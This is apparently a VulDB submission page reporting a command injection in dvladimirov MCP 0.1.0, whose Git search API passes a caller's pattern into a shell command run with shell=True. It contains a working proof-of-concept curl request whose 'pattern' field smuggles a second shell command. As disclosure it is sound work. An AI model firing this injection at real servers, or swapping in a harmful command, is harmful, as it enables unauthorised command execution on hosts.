| 标题 | dvladimirov mcp 0.1.0 Command Injection |
|---|
| 描述 | The Git search API accepts a caller-controlled pattern string and passes it into a shell command built with Python f-string interpolation. Because the command is executed with shell=True, shell metacharacters in pattern break out of the intended grep invocation and execute arbitrary host commands.
curl -s -X POST 'http://HOST:PORT/v1/models/git-analyzer/search' \
-H 'Content-Type: application/json' \
-d '{
"repo_url": "https://github.com/octocat/Hello-World.git",
"pattern": "\"; touch /tmp/dvladimirov_mcp_cmdi; #"
}' |
|---|
| 来源 | ⚠️ https://github.com/dvladimirov/MCP/issues/2 |
|---|
| 用户 | SmallW (UID 97245) |
|---|
| 提交 | 2026-04-10 14時57分 (2 月前) |
|---|
| 管理 | 2026-04-27 17時01分 (17 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 359807 [dvladimirov MCP 直到 0.1.0 Git Search API mcp_server.py GitSearchRequest repo_url/pattern 权限提升] |
|---|
| 积分 | 20 |
|---|